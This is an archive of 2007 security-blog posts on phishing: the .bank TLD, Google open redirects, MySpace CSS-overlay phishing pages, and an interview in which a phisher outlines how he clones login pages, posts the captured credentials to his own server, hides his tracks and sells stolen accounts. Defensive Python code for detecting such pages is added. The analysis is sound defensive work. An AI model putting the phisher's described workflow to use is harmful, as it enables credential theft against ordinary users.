web application security lab

Archive for the 'Phishing' Category

APWG and OpenDNS

Saturday, May 26th, 2007

After reading a comment by David Ulevitch on a post by Dragos Lungu I was pretty interested in reading a new press release from OpenDNS on how they are “partnering” with the Anti-Phishing Working Group (APWG). I actually laughed when I read it, for a few reasons. Firstly, if you read Dave Jevans’ comment he says, “We are pleased to welcome PhishTank.com as a member of the APWG.” To me that seems less like a partner and more like a client. I couldn’t find any supporting words on APWG’s website to confirm a partnership in any capacity. To me it sounds like OpenDNS is simply going to consume data from APWG.

Secondly, this affirms what I was trying to get across in my comments on my post about PhishTank’s competitive relationship with APWG. Although David Ulevitch never answered the questions I posed to him in the comments, this pretty much sums up what I was saying. Unless these players start working together, they are only causing more churn in the industry as more companies have to deal with more anti-phishing aggregators. That in turn means that companies trying to protect themselves or their consumers have to integrate more APIs, sign more contracts, or whatever, just to get the global picture of where phishing sites are. So ultimately this sounds like a good thing, although I’m skeptical of how much of a partnership it really is, given Dave Jevans’ comments. It sounds more like they are a simple consumer/submitter, just like the other APWG members, but the press release may also just be poorly written.

.bank TLD

Tuesday, May 22nd, 2007

I suppose I should weigh in on my feelings about the .bank TLD proposal. I held my tongue hoping that someone would come out and explain what they thought it would solve, and I’m glad I did. Mikko from F-Secure finally published a writeup on why it should go through to ICANN. It was actually a pretty well thought out reply. I’m not going to summarize the post - go read it and come back, I’ll wait.

Now that you’ve read it, here are my thoughts. Yes, .bank will solve some heuristics problems. No, it won’t solve all of them. Banks hire external marketing departments, regional divisions, loan offices, etc., that are all owned by the parent; those won’t be able to afford their own .bank domain and will not be protected. Piggybacking off the parent’s domain is an equally bad idea, because any XSS in the piggybacked content becomes a phishing page under the bank’s own name. And if the banks allowed external organizations to piggyback, how would that solve the problem of extended validation of the site? Anyone have any guess as to how much money external marketing companies spend on server security? Anyway, it does solve a few issues for heuristics, but it also creates a lot more. (Does this sound at all like why companies were told to buy EV certs? Has that worked for them? Why are we doing this twice?)

Banks have spent a lot of time and energy building their online presences. They can’t switch over to a new TLD on a dime. Sure, they will, because they are told it’s the right thing to do, but it’s certainly not an overnight process. How much money are they going to spend buying the domains, re-tooling their websites, re-branding them and re-educating their own staff and their customers?

.bank does not apply to some of the most heavily phished sites out there, like Amazon, eBay, PayPal, AOL, MySpace and a host of credit unions. I see where they are going with this, but it’s a slippery slope. Just because you get phished a lot doesn’t earn you the right to a .bank domain (that is the exclusive domain of banks, of course). While it may earn you a right to a .dontphishme TLD, every site on earth that does electronic transactions is going to want that.

Probably my biggest problem with this is that these companies each spend a ton of money on education and on promoting their brand. For them to switch their TLD would work against all those dollars spent, and ultimately wouldn’t prevent blind redirects, XSS phishing, or just plain old URL obfuscation. Yes, it would make detection slightly easier, but by how much? An order of magnitude? I highly doubt it, and even if it did, is the problem that we can’t detect phishing sites well, or that we can’t take them down quickly enough? I think it’s the latter, and I don’t think a .bank TLD or any other derivative is going to solve that issue.

While I applaud the creativity, I really don’t think it does enough to warrant going through. But I have no doubt that where there’s a will there’s a way, and it will go through despite my opinions. I know people mean well with these types of proposals, but I think there’s a lot more going on here than just detection. Yes, detection does need to be improved, but there are tons of ways around detection and phishers have not had to resort to them (minus a few experiments).

To me that means we are a long way from having to worry about the detection portion of the attack, and if people want to put a dent in it they should instead focus on building better extradition treaties and tougher international cybercrime laws with all countries. Currently it can take days or weeks to get phishing sites taken down because there is no political pressure to do so in certain areas. I believe people would be much better served by solving the take-down issue than by creating a new TLD that excludes more phished domains than it protects.

Phishing Through Google (Yet Again)

Sunday, May 20th, 2007

This isn’t new, but a few different people sent me a link to how Google is yet again being used for phishing. Don’t trust those Google links! I hate to say I told you so, but when Google fixed that one single redirect hole and left the dozens of others in place, I warned that this might happen.

When you leave one redirect hole in place it doesn’t matter that you closed another one. It’s a mild annoyance at best to a phisher. So this will continue to be a problem until they are all fixed. People will continue to click on those links, and the anti-phishing software will continue to be unable to blacklist them because Google doesn’t like to be blacklisted. Google is plenty happy to warn people not to click on other sites that may contain malware, though (sense some hypocrisy there?).

I’m hoping their executive management wakes up and smells the coffee. It’s something I’ve been saying for over a year now, and we are no closer to having it solved. Worse yet, it’s screwing over the consumers!

Phishing Social Networking Sites

Tuesday, May 8th, 2007

Okay, I had a lot of fun with this post. No new news here, but I was able to talk to someone who was willing to sit down and write out some thoughts from a phisher’s perspective. The phisher goes by the name “lithium” and agreed to answer a number of questions that have been on my mind for a while now. Huge thanks to him, as I think a lot of this is valuable information to the community at large. These are his words - unmodified:

How would you describe yourself? Age? Did you go to school? Interests?

Determined is the best word to describe myself. I’m 18 years young. Yes, I went to school. I left after high school. My interests are MMA (mixed martial arts), fitness and, last but not least... the internet!

How did you get your start in phishing? How did you get interested in it?

The typical scam mail that my parents kept receiving in their inbox. They were very poorly done! Yet in general they worked. So, I knew automatically I could come up with more efficient methods and have a far greater outcome.

How long have you been phishing?

I’ve been pishing since I turned 14. So that's nearly 5 years.

Do you have any idea how many people’s identities you’ve stolen so far?

Way over 20 million. Social networking worms really hit it off for me! I have so many hundreds of thousands of accounts to many websites I haven’t even got a chance to look through.

Did you need to forge any particular relationships with other people/groups to get started?

No, when I started I went solo. A lot of groups came to me asking if I wanted in; I declined.

What types of sites make the best phishing sites?

Social networking sites, any site that involves teenagers ranging from 14 years old upwards.

What are the steps you take to set up a phishing site?

I try to find a domain name that would best suit the current target, and try to find a few similarities which would make my site more realistic. Then, register it! I then find a reliable anonymous host. (Offshore are the most reliable.) Although, I do tend to use compromised hosting accounts.

Secondly, I view the page source. Then I alter the source code to post the forms information to my pishing site.

Thirdly, I create a php file which will POST the current form's information to a text file on my server. I use the same php file with every site; just minor alterations are needed since it’s merely a few lines of php code.

How many people do you typically phish per site you post?

That all depends on the size of the website (the amount of users). Usually, I pish 30k a day.

How do you monetize the identities and how much does that net you?

Social networking sites make me $500 to 1k through CPA deals. 5 times out of 10 the person uses the same password for their email account. Now, what is inside their email inbox determines how much more profit I make. If an email account has one of the following, paypal/egold/rapidshare/ebay accounts, or even the email account itself, I sell those to scammers. All in all, I make 3k to 4k a day. I only pish 3-4 days a week. It depends on how much time I invest; the more time I invest, the greater the outcome.

Are there any costs associated with phishing?

Yes there are costs. A dedicated server, VPN, Network encryption software and time.

What sort of hardware/software do you need to do this? Anything special (phishing kits, etc…)? What kind of internet connection do you use?

For MOST social networking sites, I use a program called MyChanger. You can find it on this website - www.myownchanger.com - this makes pishing so much faster on social networking sites. Everything is automated! Messaging/bulletins/comments/profile modifications, it’s great. Other than that, I get A LOT of custom programs built to suit my needs from freelance developers. My internet connection isn’t anything fancy, a standard 1Mb ADSL line.

How do you keep yourself safe from being caught?

I use VPNs, dedicated servers, proxies, and my network traffic is encrypted. All payments are made through egold.

Are there any anti-phishing deterrents (tools or technology) that make life as a phisher harder?

Oh sure, there are many things that make pishing harder. But since Internet Explorer 7 and Firefox 2 have implemented anti-phishing protection, those two cause the most irritation.

Do you foresee any changes to the phishing industry that are worthy of note?

No.

Anything else you’d like to share/last words?

Lazy web developers are the reason I’m still around pishing.

Pretty telling on the current state of affairs, I’d say. The first interesting point I took from this was that IE7 and FF2 are actually a somewhat okay deterrent. From the looks of it, it hasn’t made much of a dent in volume, only changed the tactics that phishers use. I suppose we could have guessed that, since there is no lack of phishing emails in our inboxes; still, I found it somewhat surprising that it was making any dent at all. I actually predicted that it would before IE7.0 launched, but I lost a bit of hope afterwards. Interesting nonetheless.

The second is that the password is used in more than one place 50% of the time. We already knew that, but it’s interesting to hear from a phisher’s perspective how that actually helps monetize the attack. A huge thanks to lithium, who allowed me to post all of his words. Does it make you re-think that MySpace profile you set up?

Style Injection Phishing

Saturday, May 5th, 2007

This is certainly not new, but I happened across an interesting link to a bunch of phishing sites built into MySpace. Instead of being normal phishing sites that rely on JavaScript injection or email, these MySpace phishing pages rely only on injecting a form, positioned with CSS, that overlays the page itself: the victim thinks they are logging back in to MySpace, but the form posts to the phisher’s host. The URL to find these is a simple Google dork.

At the time of writing there were 56 phishing sites on MySpace. Obviously not huge as a percentage, but it’s scary that there are any at all. It’s unclear what they want to do with these URLs; however, I spent a few minutes mapping out the hosts the phishers’ forms post to:

  • 5 x hur.be
  • 4 x willgle.com
  • 2 x r3voluti0n.com
  • 1 x m3rm.org
  • 1 x spaceadder.info
  • 1 x coolton.dajoob.com
  • 1 x www.profilespider.com
  • 1 x www.itfailz.net
  • 1 x artexstudios.com
  • 1 x members.lycos.co.uk
  • 1 x login-myspace.logindotspace.com
  • 1 x www.googleidols.com

So only 20 were working/alive when I checked. I was able to find one example of the PHP script used (almost all of them were written in PHP). This one was simply wildly mis-configured. A number of them appeared to be old and had been hobbled by MySpace, who changed the form’s URL to a “..”, which had the effect of breaking the script, but the pages were still messed up (as if MySpace pages aren’t already messed up enough to begin with). Pretty ugly.
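
As an added example (my illustration, not the kit source or anything lifted from the phishers’ sites), here is a small Python scanner for the tell this post describes, and for the one lithium describes above, where the page source is copied and the form’s action is repointed at the phisher’s server: it parses a page, resolves every form action against the page URL, and reports any form that posts to a different site, noting whether it captures a password and whether it is absolutely positioned over the page. The sample page is constructed; it uses hur.be from the list above as the off-site host and includes a neutered “..” action like the ones MySpace rewrote.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> on a page with its action, method, inline style and inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # bare attributes parse with value None, hence the 'or' defaults
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "style": (a.get("style") or "").lower().replace(" ", ""),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((a.get("type") or "text").lower(), a.get("name") or "")
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_of(netloc):
    """Host that receives the request: strip userinfo and port, lower-case."""
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def site_of(host):
    """Registrable site, approximated as the last two labels (fine for .com hosts;
    a real scanner would consult the public suffix list)."""
    return ".".join(host.split(".")[-2:])


def scan_forms(page_url, html):
    """Return one finding per form that posts to a site other than the page's own."""
    page_site = site_of(host_of(urlsplit(page_url).netloc))
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        # Relative actions (the legitimate login box, and the '..' MySpace rewrote
        # dead kits to) resolve back onto the page host and drop out here.
        action = urljoin(page_url, form["action"])
        action_host = host_of(urlsplit(action).netloc)
        if site_of(action_host) == page_site:
            continue
        types = {t for t, _ in form["inputs"]}
        findings.append({
            "action": action,
            "host": action_host,
            "method": form["method"],
            "captures_password": "password" in types,
            # Inline positioning on the <form> is the crude overlay tell; kits that
            # put it in an injected <style> block need a CSS parse this does not do.
            "overlay": "position:absolute" in form["style"] or "z-index" in form["style"],
            "fields": [n for _, n in form["inputs"] if n],
        })
    return findings


# Constructed sample: the site's real login box, a kit MySpace already neutered
# (action rewritten to '..'), and a live injected overlay posting to hur.be.
SAMPLE_PAGE_URL = "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=1"
SAMPLE_HTML = """
<form action="/index.cfm?fuseaction=login.process" method="post">
  <input type="text" name="email"><input type="password" name="password">
</form>
<form action=".." method="post" style="position:absolute; top:120px; z-index:9999">
  <input type="text" name="email"><input type="password" name="password">
</form>
<form action="http://hur.be/login.php" method="post"
      style="position: absolute; top: 120px; left: 380px; z-index: 9999">
  <input type="text" name="email"><input type="password" name="password">
  <input type="submit" value="Login">
</form>
"""

if __name__ == "__main__":
    for f in scan_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("off-site %s form to %s (password=%s, overlay=%s, fields=%s)"
              % (f["method"].upper(), f["action"], f["captures_password"],
                 f["overlay"], f["fields"]))
```

Only the hur.be form survives the filter: the real login box and the neutered kit both resolve back to myspace.com. Running this over a crawl of profile pages is exactly the kind of check MySpace could have done server-side before the profile was saved.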

Vidoop

Wednesday, April 18th, 2007

In an interesting email that was sent to me I was asked to take a peek at a new software tool, not yet released to the public, called Vidoop (there is an interesting article on it here). While I was unable to actually take a look at the software, I’ve got a pretty good idea of how it works from the Wired article. After downloading a software certificate that allows you to use their software, basically you say, “I like animals,” and it shows you pictures of horses and cats and dogs all mixed in with a bunch of non-animal photos. You choose the correct photos (à la the KittenAuth CAPTCHA) and you are granted access.

So here are the major problems with this that I see. Firstly, it’s probably not accessible (meaning there aren’t alt tags on the images), because if there were it would take only a few guesses to get in, since a computer could build databases of “like” things. So basically, as with KittenAuth, the blind are screwed (which we have talked about a dozen times and I really don’t want to start another conversation on it, I’m just sayin’). Secondly, it’s non-portable, because you have to have the software installed on the computer you want to use. That means you can only use it from one computer (forget going over to a friend’s house and logging in), and if that one computer gets hosed you need to find an alternate path for getting the software installed (which is often the least secure part of these systems). This type of design is a lot less portable than tokens, and for a consumer tokens are nearly unusable too.

Also something that makes me uncomfortable from a security perspective is the concept of single sign-on. I’ve always thought single sign-on was a great usability improvement but often terrible from a security perspective. Like the old motivational adage - you’re only as strong as your weakest link - the same is often true with single sign-on. You are often at the mercy of the weakest security model. If any one site is insecure you can (in many of the cases of single sign-on that I have seen) end up compromising all the other trusted sites. Perhaps Vidoop has a great way to solve that issue that revolutionizes the way authentication works and never opens itself up for attack under any scenario. Without looking at it, there’s no way for me to know.

Lastly, because Vidoop uses a relatively small set of photo categories to choose from, there are only a few general choices from which to brute force (otherwise you’d run into overlap and false positives). If I know the target is a male, chances are they aren’t going to pick the fuzzy animals. If I know the target is a 13 year old girl, chances are they aren’t going to pick photos of computers or sports cars, and so on. Anyway, you see the problems with this. Unlike passwords, which are user-specific (and still guessable), this is highly non-arbitrary. Does it stop phishing, keystroke logging, cure cancer or do any other magical things? I can’t say without looking at it. Will I be using it for large scale mission critical secure production installs? Doubtful.

McGruff Identity Theft

Sunday, April 8th, 2007

I guess this has been around for a while, but I just recently started seeing it on TV: the McGruff the Crime Dog campaign is now targeting identity theft. This probably wouldn’t be a big deal except that, the way the commercial is worded, it sounds like what they are showing is how identity theft works. What they show in the commercial is someone taking a camera phone picture of a credit card. Sure, that would disclose the credit card number, the name and the expiration date, but not a lot more.

Firstly, the amount of crime that camera phone skimming makes up has got to be a fraction of a percent compared with people pulling numbers out of trash cans at gas stations and restaurants, and online identity theft. Secondly, the information you get by only looking at the front of the card is only enough to do certain types of credit card transactions, especially because it’s missing the CVV2 number. Lastly, explaining identity theft in this way misses a rather huge issue, which is phishing and hacking databases.

While I think it’s interesting to market to kids ways to spot one form of identity theft that there is no chance of them being able to stop, it’s unfortunate that there are no commercials targeting them on ways to protect their identity online. COPPA laws are interesting, but they only apply if you are a scrupulous company. Unfortunately phishers and hackers don’t particularly care about people’s age. I dunno, it seemed like it may be doing more harm than good in explaining identity theft this way, and misguiding people’s understanding of the real issues.

Look for SSL, Stupid

Tuesday, March 27th, 2007

I laughed when I saw a recent phishing email. Not so much because it was a new technique - it wasn’t. It was your old generic phishing scheme with “ssl” put in the middle of the URL: leo.ne.jp/ssl/onlinebanking.capitalone.com (the real host is leo.ne.jp; the bank’s name is just a directory in the path). But it suddenly occurred to me: one thing I have heard many security people say when they are trying to explain best practices in web surfing to newbies is “look for SSL.” The term SSL means absolutely nothing to most people outside the internet technology/security space. They may understand that “https” means it’s secure or that that “little lock thingy” in the corner makes them safe, but they don’t know why, and they probably have no clue that it’s SSL in the back end. So why do we tell them to look for it?

This all goes back to my distaste for consumer education. In this case our education is working wonderfully. The consumers are looking at that nice little “ssl” word and poof, they must be secure! They’ve never seen it before and they have no idea what it means, but they know that they’re secure now. I think it would behoove the security industry to stop chastising people for being stupid when we are the ones who are misleading or miscommunicating to them in the first place. Besides, we need to come up with something more secure than SSL anyway.
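
Added example, not part of the original post: the heuristic a mail filter or toolbar would use to catch the URL above without relying on the reader. It works out which host the browser really connects to, then flags a brand name that appears only in the path or inside a host it doesn’t own, the “user@host” trick, and reassurance words like “ssl” in the path. The brand list and the token list are assumptions for the example; a real filter would load its own.

```python
from urllib.parse import urlsplit

# Brand domains whose customers are told to "look for SSL". Constructed list for
# this example; a real filter would load the brands it protects.
BRAND_DOMAINS = ("capitalone.com", "paypal.com", "ebay.com", "myspace.com")

# Words that mean nothing to a browser but a lot to a victim. Constructed list.
REASSURANCE_TOKENS = ("ssl", "secure", "login", "verify", "account", "update")


def normalise(url):
    """Mail bodies often carry 'host/path' with no scheme; give urlsplit something to parse."""
    return url if "://" in url else "http://" + url


def connect_host(url):
    """The host the browser will actually connect to, lower-cased.

    'brand.com@evil.example' connects to evil.example (userinfo), and a port
    is not part of the name, so both are stripped before comparison.
    """
    netloc = urlsplit(normalise(url)).netloc
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower().rstrip(".")


def on_brand_domain(host, brand):
    """True only when host is the brand domain itself or a subdomain of it."""
    return host == brand or host.endswith("." + brand)


def inspect_url(url):
    """Return the heuristics that fired for url; an empty list means nothing looked off."""
    parts = urlsplit(normalise(url))
    host = connect_host(url)
    reasons = []

    if "@" in parts.netloc:
        reasons.append("userinfo before '@' hides the real host %r" % host)

    if any(on_brand_domain(host, b) for b in BRAND_DOMAINS):
        return reasons  # genuinely on a brand domain

    path = parts.path.lower()
    for brand in BRAND_DOMAINS:
        label = brand.split(".")[0]  # 'capitalone'
        if label in path:
            reasons.append("brand %r in the path, but the host is %r" % (brand, host))
        elif label in host:  # e.g. login-myspace.logindotspace.com
            reasons.append("brand %r inside host %r without owning it" % (brand, host))

    hits = sorted(set(path.split("/")) & set(REASSURANCE_TOKENS))
    if hits:
        reasons.append("reassurance words in the path: %s" % ", ".join(hits))
    return reasons


if __name__ == "__main__":
    for u in ("leo.ne.jp/ssl/onlinebanking.capitalone.com",
              "https://onlinebanking.capitalone.com/login",
              "http://login-myspace.logindotspace.com/"):
        print(u, "->", inspect_url(u) or "looks fine")
```

The point of connect_host is that every one of these checks is made against the host the browser will use, not against whatever the string looks like at a glance; that is the one thing the “look for SSL” advice never taught anyone to do.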

Okay, new proposal time. Instead of inventing a new Internet (internet-s) with all its flaws, having to reinvent TCP and all the other madness all over again, what if we invented a new protocol that was still available to browsers but lived in a far more restrictive sandbox? Why not make a new protocol that does what SSL was originally intended to do - secure people. No cross domain linking, no session riding, no anti-DNS pinning issues, no communication with browser shims or handlers, no XSS or JavaScript for that matter. Just a clean, well organized and, most importantly, secured syntax that we can use for secure communication with servers. Why not? What we have now clearly isn’t working. I’m open to suggestions.

Ha.ckers.org Is A Phishing Site

Tuesday, March 6th, 2007

It’s true, because Firefox tells me so! I didn’t even realize it myself until my browser so nicely informed me that my post about extortion was potentially phishing for my password. And here I thought my site was working for me. All this time it was trying to steal my password! Thank god my browser is there to help me, cuz otherwise I would have… uhm… put my password in… somewhere… no, wait… maybe… uhm… on the page… uhm… I guess… hmmm… nothing here says password anywhere… maybe in that box that says comments… cuz that looks like it could steal stuff from me. I suppose you can sense my sarcasm, but really, come on. How is ha.ckers.org possibly anything like a phishing site? Click here to see what I saw this morning. As of the time of this blog post it’s still not fixed.

If there is anyone on earth who should be whitelisted, it’s this site, given that there is zero chance I’d ever put a phishing site up on this website (if I wanted to be a bad guy, I sure as hell wouldn’t do it on my own site). Hell, I used to work on anti-phishing software. But this strikes me as strange. What is the vetting process involved in putting something on a suspected bad site list anyway (clearly it’s not working)? From what I can tell there’s not much going on under the hood, because there’s not a single thing on that page that looks anything like a phishing site.

If I had been running a big commercial site, this could have had severe impact on my ability to do business, and my reputation with my consumers. I don’t think most people realize how bad this kind of thing is. Ha.ckers.org is one of the few sites that really is not impacted at all by this sort of thing, but I know I’d feel differently if I were running an e-commerce site. Time to re-vamp the heuristics and the process boys. Color this security guy unimpressed.

Update: Apparently I have also been put on the Microsoft anti-phishing list as well. Click here for a screenshot of that too. So it looks like this isn’t heuristics-based after all. Someone actually manually added me to the phishing list. Because that extortion post really looks scary. Nicely done guys.

Google Fixes One Redirect But Leaves Lots of Others

Saturday, February 24th, 2007

Matt Cutts (the search engine guru at Google) just posted a few comments on this site and others that picked up the story: the redirection hole being used by phishers is now closed, by adding a dialog warning you that you are being redirected (click here for an example). That is good news because 1) Google can no longer deny it’s a hole - they themselves fixed it, and 2) some consumers may now be slightly safer, kinda. But as he himself said, this really isn’t a complete fix, as this is only one of many known redirects in Google that have the potential of aiding phishing attacks.

There are 10 more redirects in Google that are still functional on this one URL alone. Google is riddled with these holes and they are incredibly easy to find. So while I applaud the fix, I am hardly impressed. It took over a year for this hole to get closed after I first announced it (you’ll notice the other three I mentioned in that post a year ago are still unfixed). There are at least 4 or 5 more that I’ve run across beyond that as well. It’s not even worth cataloging them at this point because there are so many left to fix.
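
As an added example (my code, not Google’s), here is what the difference between an open redirector and a fixed one looks like, for this post and for the “Phishing Through Google” post above. naive_target is the pattern phishers lean on: whatever the ?url= parameter says is where the user goes, under a google.com link. safe_target only follows a target that stays on an allowed host (assumed here to be google.com and www.google.com) or is a plain local path, and sends everything else, including the encodings a quick startswith('/') check would wave through, to a fallback where an interstitial like the one Google added could be served instead.

```python
from urllib.parse import parse_qs, urlsplit

# Hosts the redirector may send people to. Assumption for this example; a real
# deployment would list its own domains.
ALLOWED_HOSTS = frozenset({"www.google.com", "google.com"})


def naive_target(query):
    """The redirector as phishers use it: whatever ?url= says is where you go."""
    return parse_qs(query).get("url", [""])[0]


def target_host(parts):
    """Host a browser would connect to for a parsed URL: strip userinfo and port."""
    return parts.netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def safe_target(raw, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return raw only if it stays on an allowed host or is a plain local path.

    Anything else collapses to fallback, which is where an interstitial
    ('you are leaving this site') page would be served instead.
    """
    if not raw:
        return fallback
    # Browsers treat '\' as '/', so '/\evil.example' and '\\evil.example' are
    # scheme-relative URLs to evil.example; normalise before parsing.
    url = raw.replace("\\", "/")
    parts = urlsplit(url)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback  # javascript:, data:, and friends
    if parts.netloc:
        # exact match, not endswith: www.google.com.evil.example must fail
        return url if target_host(parts) in allowed_hosts else fallback
    if parts.scheme:
        return fallback  # 'https:evil.example' / 'http:///evil.example': scheme, no authority
    # No scheme and no authority. urlsplit has already claimed any '//host' as
    # netloc above, so a leading '/' here really is a path on our own origin.
    return url if url.startswith("/") else fallback


if __name__ == "__main__":
    query = "q=bank+login&url=http://evil.example/onlinebanking/"
    raw = naive_target(query)
    print("open redirector sends you to:", raw)
    print("fixed redirector sends you to:", safe_target(raw))
    for trick in ("//evil.example/", "/\\evil.example", "https:evil.example",
                  "http://www.google.com@evil.example/", "javascript:alert(1)"):
        print("%-40r -> %s" % (trick, safe_target(trick)))
```

Every one of the tricks in the loop is a real browser behaviour, which is why the check parses the string the way a browser will instead of pattern-matching the front of it. The second lesson is in the allowlist: one redirector fixed this way is useless if ten siblings on the same site still run naive_target.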

So good job on fixing a small percent of the problem, but Google has got a very long road ahead of them before I’d trust clicking on any unscrutinized Google link I found on the web.